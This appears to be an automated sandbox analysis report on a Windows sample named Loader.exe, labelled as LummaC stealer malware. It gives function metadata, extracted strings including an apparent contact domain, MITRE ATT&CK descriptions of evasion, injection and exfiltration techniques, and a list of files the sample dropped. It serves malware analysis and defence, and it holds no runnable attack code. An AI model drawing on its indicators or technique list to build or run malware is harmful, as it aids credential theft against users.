Opcode ID: 3ce986d396178c151528bd5f4b5afb913e096d77f4e20d0f1a1bcddece8bf8e8
Instruction ID: d33222a2ca9ce09790efce9b4cbed54a8356bf1745a76b5c02e39eac2e3862f8
Opcode Fuzzy Hash: 3ce986d396178c151528bd5f4b5afb913e096d77f4e20d0f1a1bcddece8bf8e8
Instruction Fuzzy Hash: 6B41D0B150D3818EE324AF7C944832EBFE09B96314F099A6EE8C647382C67D8549D797

Function 00411C5B Relevance: 17.0, APIs: 1, Strings: 10, Instructions: 451COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 00411C7F

Strings

4 E, xrefs: 004121D2
o+X), xrefs: 00411FB3
H#Y!, xrefs: 00411FC9
4 E, xrefs: 004121D7
8, xrefs: 00411D65
T]R#, xrefs: 00411D4F
:;:9, xrefs: 00411FDF
M/_-, xrefs: 00411FBE
D'5%, xrefs: 00411FD4
sergei-esenin.com, xrefs: 004120CB

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Uninitialize
String ID: 4 E$4 E$8$:;:9$D'5%$H#Y!$M/_-$T]R#$o+X)$sergei-esenin.com
API String ID: 3861434553-420977703
Opcode ID: e0d83c3951a9deeca5a5b059ff3980b8643d139917b223a44aaaaabbf40ac77a
Instruction ID: b550fdd234e3f7751dd64647aa8f612fe1cd7ee4e9b901a9b95261a5fc48f54b
Opcode Fuzzy Hash: e0d83c3951a9deeca5a5b059ff3980b8643d139917b223a44aaaaabbf40ac77a
Instruction Fuzzy Hash: 14E114715093818BE330CF2598517EFBBE1AF96304F08496ED4C99B292DB388549CB96

Function 0042C8DA Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142COMMON

Download Yara Rule

Strings

Q@g`, xrefs: 0042CB69
7#v, xrefs: 0042C8CD

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: Q@g`$7#v
API String ID: 0-593499481
Opcode ID: a76b6db544b6370b7875e51f78da93b6d4cdad03fe21e88086ea2638993ebbcd
Instruction ID: eae350f86fd92dff23fe4261f9e26cd0abfbdae7ba8eea48a10bab641a56ca95
Opcode Fuzzy Hash: a76b6db544b6370b7875e51f78da93b6d4cdad03fe21e88086ea2638993ebbcd
Instruction Fuzzy Hash: 8C51E1B4508344EFE3209F26E84971BBBE0FB85704F54096CF1849B2A2DB75C915CB9B

Function 004370C0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 144COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00437109
GetSystemMetrics.USER32 ref: 00437119

Strings

m|C, xrefs: 004371ED
J~C, xrefs: 004372DF
*xC, xrefs: 004371D7
xzC, xrefs: 0043732C
&~C, xrefs: 0043729D
'wC, xrefs: 004371CC
{C, xrefs: 0043730B

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: MetricsSystem
String ID: &~C$'wC$*xC$J~C$m|C$xzC${C
API String ID: 4116985748-588620804
Opcode ID: 764eab8b42627bb81cdfd695d464b7b564659876efbf52c05c039a8eca4bf054
Instruction ID: 66dada05c327a1c61d24dc321b899d0899824898c12b3fe3090271d05fad01cc
Opcode Fuzzy Hash: 764eab8b42627bb81cdfd695d464b7b564659876efbf52c05c039a8eca4bf054
Instruction Fuzzy Hash: 4FA14CB44093888AF771DF54D5897CBBBE0BB85348F20892ED5888B650C7F9548DCF9A

Function 004367AF Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043681C

Strings

0, xrefs: 004367C6
b, xrefs: 004367CE
y, xrefs: 004367BA
}, xrefs: 004367CA
0, xrefs: 004369C6
c, xrefs: 004367D2

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString
String ID: 0$0$b$c$y$}
API String ID: 2525500382-2751227332
Opcode ID: bb8b5806c04763b47c3ab5a792d058afedefd6bca67dd728f44cdc8407738252
Instruction ID: 821cf9130e8cd5f6ebb1de99dcc4691c8eaef027f498815a5d700e8551cc5c2a
Opcode Fuzzy Hash: bb8b5806c04763b47c3ab5a792d058afedefd6bca67dd728f44cdc8407738252
Instruction Fuzzy Hash: DC81E16010CBC0CEE7168B3884983167ED15B6621CF2886DDD4AA4F3D3C3ABD55BC766

Function 00431430 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

_nkQ, xrefs: 004315D2
kkUp, xrefs: 004315D9
[fbY, xrefs: 004315C4

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID:
String ID: [fbY$_nkQ$kkUp
API String ID: 0-3145123041
Opcode ID: 57f64d875186bd8352f334b1d93851cbe806884a8da132c403b6ed4246dd0043
Instruction ID: af3b9e1362d38e8e29a38f19127dd51eee7be2d5c57223e9247a5dcb9c366cf1
Opcode Fuzzy Hash: 57f64d875186bd8352f334b1d93851cbe806884a8da132c403b6ed4246dd0043
Instruction Fuzzy Hash: EF712771504B418BE332CF25C881B63BBE2AF66311F188A2ED5EB4B792D739B405CB55

Function 0043CE3B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(73A371AF), ref: 0043CEB0
SysAllocString.OLEAUT32(F3BFF1A3), ref: 0043CF95

Strings

s%u', xrefs: 0043CF12
!, xrefs: 0043CF1A

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString
String ID: !$s%u'
API String ID: 2525500382-439224852
Opcode ID: 7aa0a3e6246a502dca2869c8a1477f858b5ec105c237375db835c5495004350d
Instruction ID: 751ce87b811b7694680259d72d00ac5741bc3653d925cc6629c8f6403113edbc
Opcode Fuzzy Hash: 7aa0a3e6246a502dca2869c8a1477f858b5ec105c237375db835c5495004350d
Instruction Fuzzy Hash: 0841D0762993419BD308CFA6D8D025FBBE3ABC5304F199D2DE1949B345CBB8C50A8B52

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Loader.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_77471525334c8b14c8bdc1925498d9a2270c332_00a9e466_1e40f4b4-72b8-488c-93ed-b9672588f9e0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_b815356964293c838cede0c4a3c92463e86ea911_00a9e466_32e7d15c-7355-41ce-b09f-98a33d50d914\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Loader.exe_cb31ed643f3fc60e893b10d5662d7ffd15dc47_d9249e67_e58a3cdf-0c76-4fca-bfea-a73be3584e5f\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1D9.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3AF.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DF.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD7B.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCDE9.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE19.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF8FF.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA48.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA78.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

Windows Analysis Report
Loader.exe

Function 00192198 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 134
memoryCOMMON

Function 001A8735 Relevance: 4.7, APIs: 3, Instructions: 202
COMMON

Function 001AA691 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 001A394D Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Function 001AA295 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre